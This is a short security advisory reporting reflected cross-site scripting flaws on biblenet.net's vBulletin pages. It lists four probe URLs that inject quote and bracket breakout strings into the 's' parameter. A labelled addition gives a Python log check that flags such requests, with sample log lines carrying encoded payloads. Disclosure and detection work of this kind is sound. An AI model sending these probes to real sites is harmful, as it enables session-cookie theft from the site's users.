Biblenet.net - XSS



Biblenet.net

Homepage:
http://www.biblenet.net

Affected files:
gettinginvolved.html
register.php
member.php
/library/index.html
-----------------------------------------

Biblespace uses vBulletin for most of its site, so most of these vulnerabilities lie in vBulletin itself and have probably been found by others before.

XSS vulnerability with cookie disclosure via gettingInvolved.html:

http://www.biblenet.net/gettingInvolved.html?s=">">">">">"><"<"<"<"

XSS vulnerability with cookie disclosure via register.php:
http://www.biblenet.net/forums/register.php?s=\\">">">">">"><"<"<"<"&action=signup

XSS vulnerability with cookie disclosure via member.php when editing a profile, this time after logging in:

http://www.biblenet.net/forums/member.php?action=editprofile&s=">">">">'>'>'><"<"<"<'<'

The same XSS vulnerability as above, this time on /library/index.html:
http://www.biblenet.net/library/index.html?s=questions">">">">">"><"<"<"<"
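
Added example (not part of the original advisory): a log check a site operator could run to spot requests like the ones above, flagging any s parameter on the affected paths that carries quote or angle-bracket characters after repeated URL-decoding. The access-log format, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Paths named in the advisory; matched case-insensitively.
AFFECTED = {"/gettinginvolved.html", "/forums/register.php",
            "/forums/member.php", "/library/index.html"}
MARKUP = set("\"'<>")  # characters that break out of an HTML attribute or tag
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is also caught."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_s_values(log_lines):
    """Return (path, decoded s value) for requests whose s carries markup."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path.lower() not in AFFECTED:
            continue
        # keep_blank_values so an empty s= is still parsed, not dropped
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(value)
            if name == "s" and MARKUP & set(value):
                hits.append((url.path, value))
    return hits

# Constructed sample log lines (not taken from the site).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2006:10:00:00 +0000] "GET /forums/register.php?s=0123456789abcdef0123456789abcdef&action=signup HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2006:10:00:05 +0000] "GET /gettingInvolved.html?s=%22%3E%3Cb%3E HTTP/1.1" 200 4096',
    '203.0.113.9 - - [01/Jan/2006:10:00:09 +0000] "GET /library/index.html?s=questions%2522%253E HTTP/1.1" 200 4096',
    '203.0.113.7 - - [01/Jan/2006:10:00:12 +0000] "GET /index.html?s=%22%3E HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for path, value in suspicious_s_values(SAMPLE_LOG):
        print(f"{path}: s={value!r}")
```

A hit only shows that markup was sent in s; whether the page reflected it unescaped still has to be confirmed against the response.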

Screenshots:
http://www.youfucktard.com/xsp/biblespace1.jpg
http://www.youfucktard.com/xsp/biblespace2.jpg
http://www.youfucktard.com/xsp/biblespace3.jpg

